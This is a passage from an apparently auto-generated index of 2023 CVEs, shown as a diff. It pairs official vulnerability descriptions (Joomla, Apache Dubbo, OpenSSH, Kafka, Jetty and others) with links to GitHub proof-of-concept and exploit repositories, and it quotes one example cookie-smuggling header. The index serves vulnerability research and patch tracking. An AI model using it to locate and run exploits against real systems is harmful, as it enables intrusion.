[Mav3r1ck0x1/CVE-2023-23583-Reptar-](https://github.com/Mav3r1ck0x1/CVE-2023-23583-Reptar-) + +### CVE-2023-23607 (2023-01-20) + +erohtar/Dasherr is a dashboard for self-hosted services. In affected versions unrestricted file upload allows any unauthenticated user to execute arbitrary code on the server. The file /www/include/filesave.php allows for any file to uploaded to anywhere. If an attacker uploads a php file they can execute code on the server. This issue has been addressed in version 1.05.00. Users are advised to upgrade. There are no known workarounds for this issue.\n + + +- [Pylonet/CVE-2023-23607](https://github.com/Pylonet/CVE-2023-23607) + +### CVE-2023-23638 (2023-03-08) + +A deserialization vulnerability existed when dubbo generic invoke, which could lead to malicious code execution. \n\nThis issue affects Apache Dubbo 2.7.x version 2.7.21 and prior versions; Apache Dubbo 3.0.x version 3.0.13 and prior versions; Apache Dubbo 3.1.x version 3.1.5 and prior versions. + + +- [X1r0z/Dubbo-RCE](https://github.com/X1r0z/Dubbo-RCE) +- [YYHYlh/Apache-Dubbo-CVE-2023-23638-exp](https://github.com/YYHYlh/Apache-Dubbo-CVE-2023-23638-exp) +- [3yujw7njai/CVE-2023-23638-Tools](https://github.com/3yujw7njai/CVE-2023-23638-Tools) + +### CVE-2023-23752 (2023-02-16) + +An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints. + + +- [yusinomy/CVE-2023-23752](https://github.com/yusinomy/CVE-2023-23752) +- [Saboor-Hakimi/CVE-2023-23752](https://github.com/Saboor-Hakimi/CVE-2023-23752) +- [Vulnmachines/joomla_CVE-2023-23752](https://github.com/Vulnmachines/joomla_CVE-2023-23752) +- [sw0rd1ight/CVE-2023-23752](https://github.com/sw0rd1ight/CVE-2023-23752) +- [wangking1/CVE-2023-23752-poc](https://github.com/wangking1/CVE-2023-23752-poc) +- [ibaiw/joomla_CVE-2023-23752](https://github.com/ibaiw/joomla_CVE-2023-23752) +- [ifacker/CVE-2023-23752-Joomla](https://github.com/ifacker/CVE-2023-23752-Joomla) +- [z3n70/CVE-2023-23752](https://github.com/z3n70/CVE-2023-23752) +- [keyuan15/CVE-2023-23752](https://github.com/keyuan15/CVE-2023-23752) +- [adriyansyah-mf/CVE-2023-23752](https://github.com/adriyansyah-mf/CVE-2023-23752) +- [GhostToKnow/CVE-2023-23752](https://github.com/GhostToKnow/CVE-2023-23752) +- [gibran-abdillah/CVE-2023-23752](https://github.com/gibran-abdillah/CVE-2023-23752) +- [Jenderal92/Joomla-CVE-2023-23752](https://github.com/Jenderal92/Joomla-CVE-2023-23752) +- [Acceis/exploit-CVE-2023-23752](https://github.com/Acceis/exploit-CVE-2023-23752) +- [karthikuj/CVE-2023-23752-Docker](https://github.com/karthikuj/CVE-2023-23752-Docker) +- [0xNahim/CVE-2023-23752](https://github.com/0xNahim/CVE-2023-23752) +- [adhikara13/CVE-2023-23752](https://github.com/adhikara13/CVE-2023-23752) +- [AkbarWiraN/Joomla-Scanner](https://github.com/AkbarWiraN/Joomla-Scanner) +- [Ge-Per/Scanner-CVE-2023-23752](https://github.com/Ge-Per/Scanner-CVE-2023-23752) +- [ThatNotEasy/CVE-2023-23752](https://github.com/ThatNotEasy/CVE-2023-23752) +- [Sweelg/CVE-2023-23752](https://github.com/Sweelg/CVE-2023-23752) +- [MrP4nda1337/CVE-2023-23752](https://github.com/MrP4nda1337/CVE-2023-23752) +- [lainonz/CVE-2023-23752](https://github.com/lainonz/CVE-2023-23752) +- [yTxZx/CVE-2023-23752](https://github.com/yTxZx/CVE-2023-23752) +- [AlissonFaoli/CVE-2023-23752](https://github.com/AlissonFaoli/CVE-2023-23752) +- [Pushkarup/CVE-2023-23752](https://github.com/Pushkarup/CVE-2023-23752) +- [blacks1ph0n/CVE-2023-23752](https://github.com/blacks1ph0n/CVE-2023-23752) +- [Youns92/Joomla-v4.2.8---CVE-2023-23752](https://github.com/Youns92/Joomla-v4.2.8---CVE-2023-23752) +- [Ly0kha/Joomla-CVE-2023-23752-Exploit-Script](https://github.com/Ly0kha/Joomla-CVE-2023-23752-Exploit-Script) +- [r3dston3/CVE-2023-23752](https://github.com/r3dston3/CVE-2023-23752) +- [svaltheim/CVE-2023-23752](https://github.com/svaltheim/CVE-2023-23752) +- [Fernando-olv/Joomla-CVE-2023-23752](https://github.com/Fernando-olv/Joomla-CVE-2023-23752) +- [K3ysTr0K3R/CVE-2023-23752-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-23752-EXPLOIT) +- [hadrian3689/CVE-2023-23752_Joomla](https://github.com/hadrian3689/CVE-2023-23752_Joomla) +- [C1ph3rX13/CVE-2023-23752](https://github.com/C1ph3rX13/CVE-2023-23752) +- [JeneralMotors/CVE-2023-23752](https://github.com/JeneralMotors/CVE-2023-23752) +- [gunzf0x/CVE-2023-23752](https://github.com/gunzf0x/CVE-2023-23752) +- [TindalyTn/CVE-2023-23752](https://github.com/TindalyTn/CVE-2023-23752) +- [shellvik/CVE-2023-23752](https://github.com/shellvik/CVE-2023-23752) +- [Rival420/CVE-2023-23752](https://github.com/Rival420/CVE-2023-23752) +- [JohnDoeAnonITA/CVE-2023-23752](https://github.com/JohnDoeAnonITA/CVE-2023-23752) +- [0xWhoami35/CVE-2023-23752](https://github.com/0xWhoami35/CVE-2023-23752) +- [mariovata/CVE-2023-23752-Python](https://github.com/mariovata/CVE-2023-23752-Python) +- [0xx01/CVE-2023-23752](https://github.com/0xx01/CVE-2023-23752) +- [n3rdh4x0r/CVE-2023-23752](https://github.com/n3rdh4x0r/CVE-2023-23752) +- [mil4ne/CVE-2023-23752-Joomla-v4.2.8](https://github.com/mil4ne/CVE-2023-23752-Joomla-v4.2.8) +- [Aureum01/CVE-2023-23752](https://github.com/Aureum01/CVE-2023-23752) + +### CVE-2023-23924 (2023-01-31) + +Dompdf is an HTML to PDF converter. The URI validation on dompdf 2.0.1 can be bypassed on SVG parsing by passing `<image>` tags with uppercase letters. This may lead to arbitrary object unserialize on PHP < 8, through the `phar` URL wrapper. An attacker can exploit the vulnerability to call arbitrary URL with arbitrary protocols, if they can provide a SVG file to dompdf. In PHP versions before 8.0.0, it leads to arbitrary unserialize, that will lead to the very least to an arbitrary file deletion and even remote code execution, depending on classes that are available.\n + + +- [motikan2010/CVE-2023-23924](https://github.com/motikan2010/CVE-2023-23924) + +### CVE-2023-23946 (2023-02-14) + +Git, a revision control system, is vulnerable to path traversal prior to versions 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7, 2.32.6, 2.31.7, and 2.30.8. By feeding a crafted input to `git apply`, a path outside the working tree can be overwritten as the user who is running `git apply`. A fix has been prepared and will appear in v2.39.2, v2.38.4, v2.37.6, v2.36.5, v2.35.7, v2.34.7, v2.33.7, v2.32.6, v2.31.7, and v2.30.8. As a workaround, use `git apply --stat` to inspect a patch before applying; avoid applying one that creates a symbolic link and then creates a file beyond the symbolic link. + + +- [bruno-1337/CVE-2023-23946-POC](https://github.com/bruno-1337/CVE-2023-23946-POC) + +### CVE-2023-24044 (2023-01-22) + +A Host Header Injection issue on the Login page of Plesk Obsidian through 18.0.49 allows attackers to redirect users to malicious websites via a Host request header. NOTE: the vendor's position is "the ability to use arbitrary domain names to access the panel is an intended feature." + + +- [Cappricio-Securities/CVE-2023-24044](https://github.com/Cappricio-Securities/CVE-2023-24044) + +### CVE-2023-24055 (2023-01-22) + +KeePass through 2.53 (in a default installation) allows an attacker, who has write access to the XML configuration file, to obtain the cleartext passwords by adding an export trigger. NOTE: the vendor's position is that the password database is not intended to be secure against an attacker who has that level of access to the local PC. + + +- [deetl/CVE-2023-24055](https://github.com/deetl/CVE-2023-24055) +- [alt3kx/CVE-2023-24055_PoC](https://github.com/alt3kx/CVE-2023-24055_PoC) +- [Cyb3rtus/keepass_CVE-2023-24055_yara_rule](https://github.com/Cyb3rtus/keepass_CVE-2023-24055_yara_rule) +- [duckbillsecurity/CVE-2023-24055](https://github.com/duckbillsecurity/CVE-2023-24055) +- [julesbozouklian/PoC_CVE-2023-24055](https://github.com/julesbozouklian/PoC_CVE-2023-24055) +- [digital-dev/KeePass-TriggerLess](https://github.com/digital-dev/KeePass-TriggerLess) +- [zwlsix/KeePass-CVE-2023-24055](https://github.com/zwlsix/KeePass-CVE-2023-24055) + +### CVE-2023-24059 (2023-01-22) + +Grand Theft Auto V for PC allows attackers to achieve partial remote code execution or modify files on a PC, as exploited in the wild in January 2023. + + +- [gmh5225/CVE-2023-24059](https://github.com/gmh5225/CVE-2023-24059) + +### CVE-2023-24078 (2023-02-17) + +Real Time Logic FuguHub v8.1 and earlier was discovered to contain a remote code execution (RCE) vulnerability via the component /FuguHub/cmsdocs/. + + +- [overgrowncarrot1/CVE-2023-24078](https://github.com/overgrowncarrot1/CVE-2023-24078) +- [rio128128/CVE-2023-24078](https://github.com/rio128128/CVE-2023-24078) +- [ag-rodriguez/CVE-2023-24078](https://github.com/ag-rodriguez/CVE-2023-24078) + +### CVE-2023-24100 +- [badboycxcc/CVE-2023-24100](https://github.com/badboycxcc/CVE-2023-24100) + +### CVE-2023-24203 (-) + +Cross Site Scripting vulnerability in SourceCodester Simple Customer Relationship Management System v1.0 allows attacker to execute arbitary code via the company or query parameter(s). + + +- [momo1239/CVE-2023-24203-and-CVE-2023-24204](https://github.com/momo1239/CVE-2023-24203-and-CVE-2023-24204) + +### CVE-2023-24249 (2023-02-27) + +An arbitrary file upload vulnerability in laravel-admin v1.8.19 allows attackers to execute arbitrary code via a crafted PHP file. + + +- [IDUZZEL/CVE-2023-24249-Exploit](https://github.com/IDUZZEL/CVE-2023-24249-Exploit) + +### CVE-2023-24317 (2023-02-23) + +Judging Management System 1.0 was discovered to contain an arbitrary file upload vulnerability via the component edit_organizer.php. + + +- [angelopioamirante/CVE-2023-24317](https://github.com/angelopioamirante/CVE-2023-24317) + +### CVE-2023-24329 (2023-02-17) + +An issue in the urllib.parse component of Python before 3.11.4 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters. + + +- [H4R335HR/CVE-2023-24329-PoC](https://github.com/H4R335HR/CVE-2023-24329-PoC) +- [Pandante-Central/CVE-2023-24329-codeql-test](https://github.com/Pandante-Central/CVE-2023-24329-codeql-test) +- [PenTestMano/CVE-2023-24329-Exploit](https://github.com/PenTestMano/CVE-2023-24329-Exploit) + +### CVE-2023-24488 (2023-07-10) + +Cross site scripting vulnerability in Citrix ADC and Citrix Gateway  in allows and attacker to perform cross site scripting + + +- [SirBugs/CVE-2023-24488-PoC](https://github.com/SirBugs/CVE-2023-24488-PoC) +- [securitycipher/CVE-2023-24488](https://github.com/securitycipher/CVE-2023-24488) +- [NSTCyber/CVE-2023-24488-SIEM-Sigma-Rule](https://github.com/NSTCyber/CVE-2023-24488-SIEM-Sigma-Rule) +- [raytheon0x21/CVE-2023-24488](https://github.com/raytheon0x21/CVE-2023-24488) + +### CVE-2023-24489 (2023-07-10) + +\nA vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller. + + +- [adhikara13/CVE-2023-24489-ShareFile](https://github.com/adhikara13/CVE-2023-24489-ShareFile) +- [whalebone7/CVE-2023-24489-poc](https://github.com/whalebone7/CVE-2023-24489-poc) + +### CVE-2023-24517 (2023-08-22) + +Unrestricted Upload of File with Dangerous Type vulnerability in the Pandora FMS File Manager component, allows an attacker to make make use of this issue ( unrestricted file upload ) to execute arbitrary system commands. This issue affects Pandora FMS v767 version and prior versions on all platforms. + + +- [Argonx21/CVE-2023-24517](https://github.com/Argonx21/CVE-2023-24517) + +### CVE-2023-24538 (2023-04-06) + +Templates do not properly consider backticks (`) as Javascript string delimiters, and do not escape them as expected. Backticks are used, since ES6, for JS template literals. If a template contains a Go template action within a Javascript template literal, the contents of the action can be used to terminate the literal, injecting arbitrary Javascript code into the Go template. As ES6 template literals are rather complex, and themselves can do string interpolation, the decision was made to simply disallow Go template actions from being used inside of them (e.g. "var a = {{.}}"), since there is no obviously safe way to allow this behavior. This takes the same approach as github.com/google/safehtml. With fix, Template.Parse returns an Error when it encounters templates like this, with an ErrorCode of value 12. This ErrorCode is currently unexported, but will be exported in the release of Go 1.21. Users who rely on the previous behavior can re-enable it using the GODEBUG flag jstmpllitinterp=1, with the caveat that backticks will now be escaped. This should be used with caution. + + +- [skulkarni-mv/goIssue_dunfell](https://github.com/skulkarni-mv/goIssue_dunfell) +- [skulkarni-mv/goIssue_kirkstone](https://github.com/skulkarni-mv/goIssue_kirkstone) + +### CVE-2023-24610 (2023-02-01) + +NOSH 4a5cfdb allows remote authenticated users to execute PHP arbitrary code via the "practice logo" upload feature. The client-side checks can be bypassed. This may allow attackers to steal Protected Health Information because the product is for health charting. + + +- [abbisQQ/CVE-2023-24610](https://github.com/abbisQQ/CVE-2023-24610) + +### CVE-2023-24706 +- [hatjwe/CVE-2023-24706](https://github.com/hatjwe/CVE-2023-24706) + +### CVE-2023-24709 (2023-03-21) + +An issue found in Paradox Security Systems IPR512 allows attackers to cause a denial of service via the login.html and login.xml parameters. + + +- [DRAGOWN/Injection-vulnerability-in-Paradox-Security-Systems-IPR512-CVE-2023-24709-PoC](https://github.com/DRAGOWN/Injection-vulnerability-in-Paradox-Security-Systems-IPR512-CVE-2023-24709-PoC) + +### CVE-2023-24749 +- [mahaloz/netgear-pwnagent](https://github.com/mahaloz/netgear-pwnagent) + +### CVE-2023-24775 (2023-03-07) + +Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the selectFields parameter at \member\Member.php. + + +- [csffs/CVE-2023-24775-and-CVE-2023-24780](https://github.com/csffs/CVE-2023-24775-and-CVE-2023-24780) + +### CVE-2023-24871 (2023-03-14) + +Windows Bluetooth Service Remote Code Execution Vulnerability + + +- [ynwarcs/CVE-2023-24871](https://github.com/ynwarcs/CVE-2023-24871) + +### CVE-2023-24955 (2023-05-09) + +Microsoft SharePoint Server Remote Code Execution Vulnerability + + +- [former-farmer/CVE-2023-24955-PoC](https://github.com/former-farmer/CVE-2023-24955-PoC) + +### CVE-2023-24998 (2023-02-20) + +Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed resulting in the possibility of an attacker triggering a DoS with a malicious upload or series of uploads.\n\n\n\n\nNote that, like all of the file upload limits, the\n new configuration option (FileUploadBase#setFileCountMax) is not\n enabled by default and must be explicitly configured.\n\n\n + + +- [nice1st/CVE-2023-24998](https://github.com/nice1st/CVE-2023-24998) + +### CVE-2023-25136 (2023-02-03) + +OpenSSH server (sshd) 9.1 introduced a double-free vulnerability during options.kex_algorithms handling. This is fixed in OpenSSH 9.2. The double free can be leveraged, by an unauthenticated remote attacker in the default configuration, to jump to any location in the sshd address space. One third-party report states "remote code execution is theoretically possible." + + +- [jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free](https://github.com/jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free) +- [ticofookfook/CVE-2023-25136](https://github.com/ticofookfook/CVE-2023-25136) +- [Christbowel/CVE-2023-25136](https://github.com/Christbowel/CVE-2023-25136) +- [adhikara13/CVE-2023-25136](https://github.com/adhikara13/CVE-2023-25136) +- [nhakobyan685/CVE-2023-25136](https://github.com/nhakobyan685/CVE-2023-25136) +- [axylisdead/CVE-2023-25136_POC](https://github.com/axylisdead/CVE-2023-25136_POC) +- [H4K6/CVE-2023-25136](https://github.com/H4K6/CVE-2023-25136) +- [Business1sg00d/CVE-2023-25136](https://github.com/Business1sg00d/CVE-2023-25136) +- [malvika-thakur/CVE-2023-25136](https://github.com/malvika-thakur/CVE-2023-25136) + +### CVE-2023-25157 (2023-02-21) + +GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse. + + +- [win3zz/CVE-2023-25157](https://github.com/win3zz/CVE-2023-25157) +- [0x2458bughunt/CVE-2023-25157](https://github.com/0x2458bughunt/CVE-2023-25157) +- [murataydemir/CVE-2023-25157-and-CVE-2023-25158](https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158) +- [7imbitz/CVE-2023-25157-checker](https://github.com/7imbitz/CVE-2023-25157-checker) +- [Rubikcuv5/CVE-2023-25157](https://github.com/Rubikcuv5/CVE-2023-25157) +- [dr-cable-tv/Geoserver-CVE-2023-25157](https://github.com/dr-cable-tv/Geoserver-CVE-2023-25157) + +### CVE-2023-25194 (2023-02-07) + +A possible security vulnerability has been identified in Apache Kafka Connect API.\nThis requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config\nand a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka Connect 2.3.0.\nWhen configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config`\nproperty for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the\n`producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties.\nThis will allow the server to connect to the attacker's LDAP server\nand deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server.\nAttacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath.\n\nSince Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box\nconfigurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector\nclient override policy that permits them.\n\nSince Apache Kafka 3.4.0, we have added a system property ("-Dorg.apache.kafka.disallowed.login.modules") to disable the problematic login modules usage\nin SASL JAAS configuration. Also by default "com.sun.security.auth.module.JndiLoginModule" is disabled in Apache Kafka Connect 3.4.0. \n\nWe advise the Kafka Connect users to validate connector configurations and only allow trusted JNDI configurations. Also examine connector dependencies for \nvulnerable versions and either upgrade their connectors, upgrading that specific dependency, or removing the connectors as options for remediation. Finally,\nin addition to leveraging the "org.apache.kafka.disallowed.login.modules" system property, Kafka Connect users can also implement their own connector\nclient config override policy, which can be used to control which Kafka client properties can be overridden directly in a connector config and which cannot.\n + + +- [ohnonoyesyes/CVE-2023-25194](https://github.com/ohnonoyesyes/CVE-2023-25194) +- [YongYe-Security/CVE-2023-25194](https://github.com/YongYe-Security/CVE-2023-25194) +- [vulncheck-oss/cve-2023-25194](https://github.com/vulncheck-oss/cve-2023-25194) + +### CVE-2023-25202 +- [Trackflaw/CVE-2023-25202](https://github.com/Trackflaw/CVE-2023-25202) + +### CVE-2023-25203 +- [Trackflaw/CVE-2023-25203](https://github.com/Trackflaw/CVE-2023-25203) + +### CVE-2023-25234 (2023-02-27) + +Tenda AC500 V2.0.1.9(1307) is vulnerable to Buffer Overflow in function fromAddressNat via parameters entrys and mitInterface. + + +- [FzBacon/CVE-2023-25234_Tenda_AC6_stack_overflow](https://github.com/FzBacon/CVE-2023-25234_Tenda_AC6_stack_overflow) + +### CVE-2023-25260 (2023-03-28) + +Stimulsoft Designer (Web) 2023.1.3 is vulnerable to Local File Inclusion. + + +- [trustcves/CVE-2023-25260](https://github.com/trustcves/CVE-2023-25260) + +### CVE-2023-25261 (2023-03-27) + +Certain Stimulsoft GmbH products are affected by: Remote Code Execution. This affects Stimulsoft Designer (Desktop) 2023.1.4 and Stimulsoft Designer (Web) 2023.1.3 and Stimulsoft Viewer (Web) 2023.1.3. Access to the local file system is not prohibited in any way. Therefore, an attacker may include source code which reads or writes local directories and files. It is also possible for the attacker to prepare a report which has a variable that holds the gathered data and render it in the report. + + +- [trustcves/CVE-2023-25261](https://github.com/trustcves/CVE-2023-25261) + +### CVE-2023-25262 (2023-03-28) + +Stimulsoft GmbH Stimulsoft Designer (Web) 2023.1.3 is vulnerable to Server Side Request Forgery (SSRF). TThe Reporting Designer (Web) offers the possibility to embed sources from external locations. If the user chooses an external location, the request to that resource is performed by the server rather than the client. Therefore, the server causes outbound traffic and potentially imports data. An attacker may also leverage this behaviour to exfiltrate data of machines on the internal network of the server hosting the Stimulsoft Reporting Designer (Web). + + +- [trustcves/CVE-2023-25262](https://github.com/trustcves/CVE-2023-25262) + +### CVE-2023-25263 (2023-03-27) + +In Stimulsoft Designer (Desktop) 2023.1.5, and 2023.1.4, once an attacker decompiles the Stimulsoft.report.dll the attacker is able to decrypt any connectionstring stored in .mrt files since a static secret is used. The secret does not differ between the tested versions and different operating systems. + + +- [trustcves/CVE-2023-25263](https://github.com/trustcves/CVE-2023-25263) + +### CVE-2023-25292 (2023-04-27) + +Reflected Cross Site Scripting (XSS) in Intermesh BV Group-Office version 6.6.145, allows attackers to gain escalated privileges and gain sensitive information via the GO_LANGUAGE cookie. + + +- [brainkok/CVE-2023-25292](https://github.com/brainkok/CVE-2023-25292) +- [tucommenceapousser/CVE-2023-25292](https://github.com/tucommenceapousser/CVE-2023-25292) + +### CVE-2023-25355 (2023-04-04) + +CoreDial sipXcom up to and including 21.04 is vulnerable to Insecure Permissions. A user who has the ability to run commands as the `daemon` user on a sipXcom server can overwrite a service file, and escalate their privileges to `root`. + + +- [glefait/CVE-2023-25355-25356](https://github.com/glefait/CVE-2023-25355-25356) + +### CVE-2023-25581 (2024-10-10) + +pac4j is a security framework for Java. `pac4j-core` prior to version 4.0.0 is affected by a Java deserialization vulnerability. The vulnerability affects systems that store externally controlled values in attributes of the `UserProfile` class from pac4j-core. It can be exploited by providing an attribute that contains a serialized Java object with a special prefix `{#sb64}` and Base64 encoding. This issue may lead to Remote Code Execution (RCE) in the worst case. Although a `RestrictedObjectInputStream` is in place, that puts some restriction on what classes can be deserialized, it still allows a broad range of java packages and potentially exploitable with different gadget chains. pac4j versions 4.0.0 and greater are not affected by this issue. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [p33d/CVE-2023-25581](https://github.com/p33d/CVE-2023-25581) + +### CVE-2023-25610 +- [qi4L/CVE-2023-25610](https://github.com/qi4L/CVE-2023-25610) + +### CVE-2023-25690 (2023-03-07) + +Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 allow a HTTP Request Smuggling attack.\n\n\n\n\nConfigurations are affected when mod_proxy is enabled along with some form of RewriteRule\n or ProxyPassMatch in which a non-specific pattern matches\n some portion of the user-supplied request-target (URL) data and is then\n re-inserted into the proxied request-target using variable \nsubstitution. For example, something like:\n\n\n\n\nRewriteEngine on\nRewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1"; [P]\nProxyPassReverse /here/ http://example.com:8080/\n\n\nRequest splitting/smuggling could result in bypass of access controls in the proxy server, proxying unintended URLs to existing origin servers, and cache poisoning. Users are recommended to update to at least version 2.4.56 of Apache HTTP Server.\n\n\n + + +- [tbachvarova/linux-apache-fix-mod_rewrite-spaceInURL](https://github.com/tbachvarova/linux-apache-fix-mod_rewrite-spaceInURL) +- [dhmosfunk/CVE-2023-25690-POC](https://github.com/dhmosfunk/CVE-2023-25690-POC) +- [thanhlam-attt/CVE-2023-25690](https://github.com/thanhlam-attt/CVE-2023-25690) + +### CVE-2023-25725 (2023-02-14) + +HAProxy before 2.7.3 may allow a bypass of access control because HTTP/1 headers are inadvertently lost in some situations, aka "request smuggling." The HTTP header parsers in HAProxy may accept empty header field names, which could be used to truncate the list of HTTP headers and thus make some headers disappear after being parsed and processed for HTTP/1.0 and HTTP/1.1. For HTTP/2 and HTTP/3, the impact is limited because the headers disappear before being parsed and processed, as if they had not been sent by the client. The fixed versions are 2.7.3, 2.6.9, 2.5.12, 2.4.22, 2.2.29, and 2.0.31. + + +- [sgwgsw/LAB-CVE-2023-25725](https://github.com/sgwgsw/LAB-CVE-2023-25725) + +### CVE-2023-25813 (2023-02-22) + +Sequelize is a Node.js ORM tool. In versions prior to 6.19.1 a SQL injection exploit exists related to replacements. Parameters which are passed through replacements are not properly escaped which can lead to arbitrary SQL injection depending on the specific queries in use. The issue has been fixed in Sequelize 6.19.1. Users are advised to upgrade. Users unable to upgrade should not use the `replacements` and the `where` option in the same query. + + +- [bde574786/Sequelize-1day-CVE-2023-25813](https://github.com/bde574786/Sequelize-1day-CVE-2023-25813) +- [White-BAO/CVE-2023-25813](https://github.com/White-BAO/CVE-2023-25813) +- [pbj2647/CVE-2023-25813](https://github.com/pbj2647/CVE-2023-25813) +- [wxuycea/CVE-2023-25813](https://github.com/wxuycea/CVE-2023-25813) +- [sea-middle/cve-2023-25813](https://github.com/sea-middle/cve-2023-25813) + +### CVE-2023-25950 (2023-04-11) + +HTTP request/response smuggling vulnerability in HAProxy version 2.7.0, and 2.6.1 to 2.6.7 allows a remote attacker to alter a legitimate user's request. As a result, the attacker may obtain sensitive information or cause a denial-of-service (DoS) condition. + + +- [dhmosfunk/HTTP3ONSTEROIDS](https://github.com/dhmosfunk/HTTP3ONSTEROIDS) + +### CVE-2023-26035 (2023-02-25) + +ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution via Missing Authorization. There are no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id. This issue is fixed in This issue is fixed in versions 1.36.33 and 1.37.33. + + +- [rvizx/CVE-2023-26035](https://github.com/rvizx/CVE-2023-26035) +- [m3m0o/zoneminder-snapshots-rce-poc](https://github.com/m3m0o/zoneminder-snapshots-rce-poc) +- [heapbytes/CVE-2023-26035](https://github.com/heapbytes/CVE-2023-26035) +- [Yuma-Tsushima07/CVE-2023-26035](https://github.com/Yuma-Tsushima07/CVE-2023-26035) +- [0xfalafel/zoneminder_CVE-2023-26035](https://github.com/0xfalafel/zoneminder_CVE-2023-26035) + +### CVE-2023-26048 (2023-04-18) + +Jetty is a java based web server and servlet engine. In affected versions servlets with multipart support (e.g. annotated with `@MultipartConfig`) that call `HttpServletRequest.getParameter()` or `HttpServletRequest.getParts()` may cause `OutOfMemoryError` when the client sends a multipart request with a part that has a name but no filename and very large content. This happens even with the default settings of `fileSizeThreshold=0` which should stream the whole part content to disk. An attacker client may send a large multipart request and cause the server to throw `OutOfMemoryError`. However, the server may be able to recover after the `OutOfMemoryError` and continue its service -- although it may take some time. This issue has been patched in versions 9.4.51, 10.0.14, and 11.0.14. Users are advised to upgrade. Users unable to upgrade may set the multipart parameter `maxRequestSize` which must be set to a non-negative value, so the whole multipart content is limited (although still read into memory). + + +- [Trinadh465/jetty_9.4.31_CVE-2023-26048](https://github.com/Trinadh465/jetty_9.4.31_CVE-2023-26048) +- [hshivhare67/Jetty-v9.4.31_CVE-2023-26048](https://github.com/hshivhare67/Jetty-v9.4.31_CVE-2023-26048) + +### CVE-2023-26049 (2023-04-18) + +Jetty is a java based web server and servlet engine. Nonstandard cookie parsing in Jetty may allow an attacker to smuggle cookies within other cookies, or otherwise perform unintended behavior by tampering with the cookie parsing mechanism. If Jetty sees a cookie VALUE that starts with `"` (double quote), it will continue to read the cookie string until it sees a closing quote -- even if a semicolon is encountered. So, a cookie header such as: `DISPLAY_LANGUAGE="b; JSESSIONID=1337; c=d"` will be parsed as one cookie, with the name DISPLAY_LANGUAGE and a value of b; JSESSIONID=1337; c=d instead of 3 separate cookies. This has security implications because if, say, JSESSIONID is an HttpOnly cookie, and the DISPLAY_LANGUAGE cookie value is rendered on the page, an attacker can smuggle the JSESSIONID cookie into the DISPLAY_LANGUAGE cookie and thereby exfiltrate it. This is significant when an intermediary is enacting some policy based on cookies, so a smuggled cookie can bypass that policy yet still be seen by the Jetty server or its logging system. This issue has been addressed in versions 9.4.51, 10.0.14, 11.0.14, and 12.0.0.beta0 and users are advised to upgrade. There are no known workarounds for this issue. + + +- [hshivhare67/Jetty_v9.4.31_CVE-2023-26049](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2023-26049) + +### CVE-2023-26067 (2023-04-10) + +Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4). + + +- [horizon3ai/CVE-2023-26067](https://github.com/horizon3ai/CVE-2023-26067) + +### CVE-2023-26136 (2023-07-01) + +Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized. + + +- [CUCUMBERanOrSNCompany/SealSecurityAssignment](https://github.com/CUCUMBERanOrSNCompany/SealSecurityAssignment) +- [ronmadar/Open-Source-Seal-Security](https://github.com/ronmadar/Open-Source-Seal-Security) +- [m-lito13/SealSecurity_Exam](https://github.com/m-lito13/SealSecurity_Exam) + +### CVE-2023-26144 (2023-09-20) + +Versions of the package graphql from 16.3.0 and before 16.8.1 are vulnerable to Denial of Service (DoS) due to insufficient checks in the OverlappingFieldsCanBeMergedRule.ts file when parsing large queries. This vulnerability allows an attacker to degrade system performance.\r\r**Note:** It was not proven that this vulnerability can crash the process. + + +- [tadhglewis/apollo-koa-minimal](https://github.com/tadhglewis/apollo-koa-minimal) + +### CVE-2023-26255 (2023-02-28) + +An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjCustomDesignConfig endpoint, it is possible to traverse and read the file system. + + +- [tucommenceapousser/CVE-2023-26255-Exp](https://github.com/tucommenceapousser/CVE-2023-26255-Exp) +- 